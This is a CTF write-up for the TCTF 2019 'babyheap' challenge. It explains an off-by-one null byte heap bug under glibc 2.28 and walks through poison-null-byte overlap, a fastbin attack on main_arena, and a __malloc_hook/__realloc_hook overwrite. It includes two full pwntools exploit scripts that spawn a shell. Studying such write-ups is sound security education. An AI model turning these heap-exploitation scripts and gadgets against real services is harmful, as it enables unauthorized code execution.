[TCTF 2019] Babyheap

在二进制的蛮荒世界里
有最迷惑的漏洞和最险恶的防护
IDA 和 gdb 是忠实的伙伴
逻辑和决心是我们的武器
热爱是引路人

Hi, This is my first time to give a write-up in English. I attended TCTF 2019 last weekend and lucky enough to solve this lovely babyheap challenge 30mins before the game finished. Really enjoy this challenge and want to share it with more pwn players.

The challenge package contains 3 files: a 64bit ELF called babyheap, and two libraries ld-2.28.so and libc-2.28.so, seems that it is deployed under Ubuntu 18.10. If you’re using 16.04 or other versions of ubuntu, you certainly could run this binary with LD_PRELOAD, but my suggestion is setting up an 18.10 environment for debugging, because with libc6-dbg installed, you can get libc symbol and view the heap state easily. Meanwhile, the function offset from libc would be exactly the same as the target machine. Docker is a good option.

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

No surprise, all mitigations are presented, and as per its definition, this is a common note system challenge with the following menu:

===== Baby Heap in 2019 =====
1. Allocate
2. Update
3. Delete
4. View
5. Exit
Command:

Vulnerability: off-by-one null byte

It looks very familiar to me and I remember there was a similar babyheap challenge last year. I dropped them both in ida and look at the difference, then I identify the bug very soon. babyheap 2018 on the left, babyheap 2019 on the right. The change appears in update function, when it read the new content for an allocated chunk, it calls a function to get input.
bug1
I followed into the function and, clearly, there is an off-by-one null byte bug in our 2019 challenge.
bug2
Beside that, another change occurs in the init function, which stealthily malloc a large chunk.
difference
Other parts of the program are identical. BTW, babyheap 2018 was given an arbitrary off-by-one bug, we can overwrite one extra byte to the size of next chunk. A great writeup (in Chinese) can be found here: 0CTF 2018 Babyheap

Constrains and thoughts

OK, let’s wrap up the bug and constraints of this challenge:

Bug: off-by-one null byte
Constrains:
1. list address randomization
2. 0 < size < 88 (0x58)
3. at max 16 items in the array
4. libc 2.28 with tcache feature

In the init function, we can see the pointers of allocated items are not store at bss section as usual, but in a random memory space change each runtime. This prevents us to perform unlink attack technique or use the pointer list to perform arbitrary write. Also, it brings us some inconvenience when debugging, so I patch the file string /dev/urandom to ./addr\x00, and create an addr file with 16 bytes in the same directory. With this trick, the address of item array fixed on each run.

There are two known techniques about off-by-one null byte, we can find them on how2heap, the first one is house-of-einherjar, which results in getting a controlled pointer; the second is poison null byte, which leads to overlapping chunks. But both of techniques require the ability to malloc a small bin chunk, for example, we need to have a chunk size like 0x1xx, so that we could overwrite it to 0x100 and perform following steps. So mission one for us: figure out how to create a small bin chunk.

Small bin chunk

Remeber the suspicious malloc(0x1f000) in init function? After this operation, the top chunk becomes 0x1da0.

pwndbg> heapinfoall
===================  Thread 1  ===================
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555578260 (size : 0x1da0) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0

Then I investigated the source code of malloc.c, it seems that when top chunk size is not enough for the malloc request, it will call malloc_consolidate() function and merge the freed chunk in fastbins! So, the idea is making a sequence of chunks on the fastbins, then consume the top chunk until small enough. Then any larger request will trigger malloc_consolidate() and make a small bin size chunk.

At first I worried about the tcache feature will prevent us from consuming the top chunk too far, however, it turns out tcache does not apply to calloc, once a chunk get into tcache bin, you cannot allocate it again with calloc. Also, we can shrink the top chunk size each time after allocation, this trick can help us to consume the top chunk quickly. Here is the heap state before triggering malloc_consolidate():

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x555555578c80 --> 0x555555578c20 --> 0x555555578bc0 --> 0x555555578b60 --> 0x555555578b00 --> 0x555555578aa0 --> 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555578e10 (size : 0x30) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
(0x30)   tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40)   tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50)   tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60)   tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270

Then we calloc(0x28), it triggers malloc_consolidate() and merage fastbin chunk into unsotredbin, creating a chunk in size of 0x210

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555578e10 (size : 0x30) 
       last_remainder: 0x555555578ad0 (size : 0x210) 
            unsortbin: 0x555555578ad0 (size : 0x210)
(0x30)   tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40)   tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50)   tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60)   tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270

Posion Null Byte

Comparing two techniques about off-by-one null byte, house of einherjar seems not to suit for this case, so let’s play with poison null byte. Here’s an amazing blog about it: Posion null byte | Ret2Forever (also in Chinese), which makes me feel I have to borrow a picture from it.
posionnullbyte
As the author concluded in this blog post, we need to allocate 3 chunks in this technique, name them a, b, c. Chunk a can be arbitrary size, but chunk b and c must not be fastbin size. Now we can make an unsorted bin to serve as chunk b, but what about chunk c? Does it have to be non-fastbin? No, the purpose of chunk c is to merge with chunk b and create a large chunk which overlap with some small chunks inside. So actually we can use the same trick in the last section to trigger malloc_consolidate and merge chunk b and c. Okey dokey, if we lay out the heap as it suggested, we can get the heap state like:

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555578e10 (size : 0x30) 
       last_remainder: 0x555555578b10 (size : 0x230) 
            unsortbin: 0x555555578b10 (size : 0x230)
(0x020)  smallbin[ 0]: 0x555555578cb0 (overlap chunk with 0x555555578b10(freed) )
(0x30)   tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40)   tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50)   tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60)   tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270

and the item array is like:

0xc0e5acba260:  0x1     0x58
0xc0e5acba270:  0x555555578a50  0x1
0xc0e5acba280:  0x48    0x555555578d50
0xc0e5acba290:  0x1     0x48
0xc0e5acba2a0:  0x555555578da0  0x1
0xc0e5acba2b0:  0x28    0x555555578df0
0xc0e5acba2c0:  0x1     0x28
0xc0e5acba2d0:  0x555555578ab0  0x1
0xc0e5acba2e0:  0x30    0x555555578ae0
0xc0e5acba2f0:  0x1     0x58
0xc0e5acba300:  {{0x555555578b40}}  0x0
0xc0e5acba310:  0x0     0x0
0xc0e5acba320:  0x1     0x58
0xc0e5acba330:  0x555555578ba0  0x1
0xc0e5acba340:  0x58    0x555555578c00
0xc0e5acba350:  0x1     0x58
0xc0e5acba360:  0x555555578c60  0x0

Now the large chunk in unsortedbin(0x555555578b10) is already overlap with item #6(0x555555578b40). Following job is straight-forward, just like baby heap 2018. We perform fastbin attack to get an item from the address in main_arena, then we change top chunk to somewhere before __malloc_hook, then we could overwrite __malloc_hook with one gadget. Btw, you have to turn on ASLR to complete fastbin attack on main_arena, and it only success when heap address starts with 0x56, otherwise the size check fails.

But unfortunately, all one gadget in libc-2.28 does not meet the requirement at the call:

0x50186 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x501e3 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x103f50 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

@Tac1t0rnX also conclude some workaround for this situation here:
Pwnable.tw secretgarden , I first try to write __malloc_hook to _libc_realloc+??? and __realloc_hook to one_gadget, but it also failed. So I have to turn to __free_hook trick, which overwrites top chunk to __free_hook - 0xb58, and allocate a bunch of junk chunk to reach __free_hook. To consume the top chunk and reach __free_hook buffer, we need to zero out the fastbin after each free. Here is my very first dirty exp used in the game.

Exp #1

from pwn import *
import re

# context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': './libc-2.28.so'}
libc = ELF('./libc-2.28.so')

if len(sys.argv) == 1:
    p = process('./babyheap1')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

def rc(x):
    return p.recv(x)

def ru(x):
    return p.recvuntil(x)

def se(x):
    return p.send(x)

def sl(x):
    return p.sendline(x)

def sea(a, b):
    return p.sendafter(a, b)

def sla(a, b):
    return p.sendlineafter(a, b)

def info_addr(tag, addr):
    return p.info(tag + ': {:#x}'.format(addr))

patten = re.compile("Chunk (.*) Allocated")
def alloc(size):
    ru('Command: ')
    sl('1')
    ru('Size: ')
    sl(str(size))
    res = ru('\n')
    return int(patten.search(res).group(1))
    

def update(idx, size, content):
    ru('Command: ')
    sl('2')
    ru('Index: ')
    sl(str(idx))
    ru('Size: ')
    sl(str(size))
    ru('Content: ')
    se(content)

def delete(idx):
    ru('Command: ')
    sl('3')
    ru('Index: ')
    sl(str(idx))

def view(idx):
    ru('Command: ')
    sl('4')
    ru('Index: ')
    sl(str(idx))

def prepare_fastbin():
    alloc(0x58) #0 stay     0x60  
    alloc(0x58) #1 fastbin  0xc0    
    alloc(0x58) #2 fastbin  0x120
    alloc(0x58) #3 fastbin  0x180
    alloc(0x58) #4 fastbin  0x1e0
    alloc(0x58) #5 fastbin  0x240
    alloc(0x58) #6 fastbin  0x2a0
    alloc(0x58) #7 fastbin  0x300
    # prepare fake chunk c.prev_size = 0x200
    update(6, 0x48, '\x00'*0x40+p64(0x200))


def strain_and_prepare():
    # fill tcache to comsume top chunk size
    for size in [0x58, 0x48]:
        for i in range(7):
            _id = alloc(size)
            update(_id, size, 'a'*size)
            delete(_id)

    prepare_fastbin()

    # continue to fill tcache and waste top chunk
    size = 0x38
    for i in range(7):
        _id = alloc(size)
        update(_id, size, 'a'*size)
        delete(_id)

    size = 0x28
    for i in range(5):
        _id = alloc(size)
        update(_id, size, 'a'*size)
        delete(_id)
    # now top_chunk->size = 0x100

    # put them in fastbin to wait for consolidate
    for i in range(1, 7):
            delete(i)

    alloc(0x48)
    alloc(0x48)

# calloc will NOT get from tcache !!!
# we can only get it from fastbin !!!

strain_and_prepare()
# now top_chunk->size = 0x60
# strain top_chunk size to trigger consolidate
alloc(0x28)
alloc(0x28)


# now #4(0x28) is at 0x87a0, a small bin (0x210) at 0x87c0
# we can off-by-one to set small bin chunk to 0x100.
update(4, 0x28, 'a'*0x28)

alloc(0x58) #5 fastbin
alloc(0x58) #6 stay
alloc(0x58) #7 stay
alloc(0x58) #8 stay
alloc(0x58) #9 stay

# push in fastbin
update(5, 0x51, 'a'*0x50 + p8(0x60))
delete(7)
delete(5)

# consolidate
alloc(0x30)
# OVERLAP!!! now 6,7,8,9 in used but also in unsortbin
victim = alloc(0x58) #7
# 6: 0x555555578830, 7: 0x555555578810 overlap

# leak libc
view(6)
ru(': ')
leak = ru('\n')
leak_libc = u64(leak[0x40: 0x48])
info_addr('leak_libc', leak_libc)
libc.address = leak_libc - 0x1e4ca0
info_addr('libc', libc.address)

# leak heap
# recover 6's header
alloc(0x48) #11
delete(1)
delete(11)
view(6)
ru(': ')
leak = ru('\n')
leak_heap = u64(leak[0x40: 0x48])
info_addr('leak_heap', leak_heap)
heap = leak_heap - 0x1fce0
info_addr('heap', heap)

# fastbin attack, get top_chunk at main_arena.
# to fake size in main arnea
delete(0)
arena_target = libc.address + 0x1e4c6d
update(6, 0x48, '\x00'*0x38 + p64(0x51) + p64(arena_target))
t = alloc(0x48) # junk
arena_buf = alloc(0x48) 

delete(t)
delete(3)
junk = alloc(0x28)
delete(junk)
junk = alloc(0x28)
delete(junk)
fb_handler = libc.address + 0x1e4c55
update(6, 0x48, '\x00'*0x38 + p64(0x51) + p64(fb_handler))
t = alloc(0x48) # junk
fb_handler = alloc(0x48) 
update(fb_handler, 0x40, '\x00'*0x40) # clean bin


main_arena = libc.address + 0x1e4c40
info_addr("arena", main_arena)
# new_top = main_arena - 0x33 malloc_hook failed!
free_hook = libc.address + 0x1e68e8
info_addr("free_hook", free_hook)
new_top = free_hook - 0xb58 
info_addr("new top", new_top)
update(arena_buf, 43, '\x00'*35 + p64(new_top))

one_gadget = libc.address + 0x501e3

alloc(0x58)
alloc(0x58)
alloc(0x58)
junk = alloc(0x20)
delete(junk)
junk = alloc(0x20)
delete(junk)
junk = alloc(0x28)
delete(junk)

# to reach free_hook
old = alloc(0x58)
new = alloc(0x58)
for i in range(29):
    delete(old)
    update(fb_handler, 0x30, '\x00'*0x30) # clean bin
    old = new
    new = alloc(0x58)

update(14, 0x10, p64(0) + p64(libc.symbols['system']))
update(0, 8, '/bin/sh\x00')
delete(0)

p.interactive()

Better solution?

Actually, it wasted me a lot of time when debugging with the __free_hook trigger, so after the game, I wonder if there is any better way to call the one gadget? From the write up by r3kapig: here, I found they write __malloc_hook to svc_run+0x38 and __realloc_hook to one_gadget. svc_run+0x38 happen to be call realloc, with this additional call, it makes [rsp+0x40]==0 at the one gadget point.

svc_run

but it is still a coincidence, can we have something more general for similar situation? So I looked at every call realloc in libc-2.28.so, and finally found a perfect jump gadget. The gadget is at 0x105ae0, which can help to set [rsp+0x38] to 0, and then call realloc, when the program hit our one gadget point, [rsp+0x40] is exactly where we set 0 before!
So next time when you meet the situation in libc-2.28, feel confident to set __malloc_hook to libc+0x105ae0 and __realloc_hook to second one gadget.

gadget

Here is my refined exp:

from pwn import *
import re

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': './libc-2.28.so'}
libc = ELF('./libc-2.28.so')

if len(sys.argv) == 1:
    p = process('./babyheap1')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

def rc(x):
    return p.recv(x)

def ru(x):
    return p.recvuntil(x)

def se(x):
    return p.send(x)

def sl(x):
    return p.sendline(x)

def sea(a, b):
    return p.sendafter(a, b)

def sla(a, b):
    return p.sendlineafter(a, b)

def info_addr(tag, addr):
    return p.info(tag + ': {:#x}'.format(addr))

patten = re.compile("Chunk (.*) Allocated")
def alloc(size):
    ru('Command: ')
    sl('1')
    ru('Size: ')
    sl(str(size))
    res = ru('\n')
    return int(patten.search(res).group(1))

def update(idx, size, content):
    ru('Command: ')
    sl('2')
    ru('Index: ')
    sl(str(idx))
    ru('Size: ')
    sl(str(size))
    ru('Content: ')
    se(content)

def delete(idx):
    ru('Command: ')
    sl('3')
    ru('Index: ')
    sl(str(idx))

def view(idx):
    ru('Command: ')
    sl('4')
    ru('Index: ')
    sl(str(idx))

def prepare_fastbin():
    a = alloc(0x58) #0 stay     0x60  
    b1 = alloc(0x58) #1 fastbin  0xc0    
    b2 = alloc(0x58) #2 fastbin  0x120
    b3 = alloc(0x58) #3 fastbin  0x180
    b4 = alloc(0x58) #4 fastbin  0x1e0
    b5 = alloc(0x58) #5 fastbin  0x240
    b6 = alloc(0x58) #6 fastbin  0x2a0
    c = alloc(0x58) #7 fastbin  0x300
    # prepare fake chunk c.prev_size = 0x200
    update(7, 0x48, '\x00'*0x40+p64(0x200))

    # put them in fastbin to wait for consolidate
    for i in range(1, 7):
            delete(i)

def strain_and_prepare():
    # fill tcache to comsume top chunk size
    for size in [0x58, 0x48, 0x38]:
        for i in range(7):
            _id = alloc(size)
            update(_id, size, 'a'*size)
            delete(_id)

    size = 0x28
    for i in range(2): # fill tcache
        _id = alloc(size)
        delete(_id)
    for i in range(5):
        _id = alloc(size)
        update(_id, size, 'a'*size)
        delete(_id)

    # now top_chunk->size = 0x100
    prepare_fastbin()

    alloc(0x48) #0
    alloc(0x48) #1
    alloc(0x28)

strain_and_prepare()
# now top_chunk->size = 0x30
# we can alloc any size >= 0x30 to trigger consolidate
off_by_one_chunk = alloc(0x28)

# now off_by_one_chunk(0x28) is at 0x87a0, a small bin (0x210) at 0x87c0
# we can off-by-one to set small bin chunk to 0x200.
update(off_by_one_chunk, 0x28, 'a'*0x28)

a = alloc(0x58) # fastbin
b1 = alloc(0x58) # in_used 
b2 = alloc(0x58) # in_used 
b3 = alloc(0x58) # in_used 
b4 = alloc(0x58) # fastbin 
c = 7

# push in fastbin
update(a, 0x51, 'a'*0x50 + p8(0x60)) # put a fake chunk size to bypass check
delete(c)
delete(a)

# trigger consolidate
alloc(0x30)
# [OVERLAP] now [b1, b2, b3, b4] in used but also in unsortbin
victim = alloc(0x58)
# b1[0x58]: 0x555555578830, 
# victim[0x58]: 0x555555578810 overlap

# leak libc
view(b1)
ru(': ')
leak = ru('\n')
leak_libc = u64(leak[0x40: 0x48])
info_addr('leak_libc', leak_libc)
libc.address = leak_libc - 0x1e4ca0
info_addr('libc', libc.address)

# leak heap
victim2 = alloc(0x48)
delete(1) # [0x48]
delete(victim2)
view(b1)
ru(': ')
leak = ru('\n')
leak_heap = u64(leak[0x40: 0x48])
info_addr('leak_heap', leak_heap)
heap = leak_heap - 0x1fce0
info_addr('heap', heap)

# fastbin attack, get top_chunk at main_arena.
delete(4) # [0x28]
arena_target = libc.address + 0x1e4c55
# edit victim2->fd
update(b1, 0x48, '\x00'*0x38 + p64(0x51) + p64(arena_target))
junk = alloc(0x48)
arena_buf = alloc(0x48) 

main_arena = libc.address + 0x1e4c40
info_addr("arena", main_arena)
malloc_hook = libc.symbols['__malloc_hook']
info_addr("malloc hook", malloc_hook)
new_top = malloc_hook - 0x28
info_addr("new top", new_top)
update(arena_buf, 0x43, '\x00'*0x3b + p64(new_top))

# consume remain unsortedbin
for i in range(4):
    junk = alloc(0x58)
    delete(junk)
    update(arena_buf, 0x30, '\x00'*0x30)

victim = alloc(0x58)

one_gadget = libc.address + 0x501e3
jump_gadget = libc.address + 0x105ae0

update(victim, 0x20, '\x00'*0x10 + p64(one_gadget) + p64(jump_gadget))

# allocate chunk to trigger one gadget
sl("1")
sl("1")

p.interactive()

Final words

With this challenage solved, our team ranked at 10th place in risingstar scoreboard. Thanks for @eee and @Oops for all great challenges, really enjoy the game! Wish our team can meet top players in Shanghai!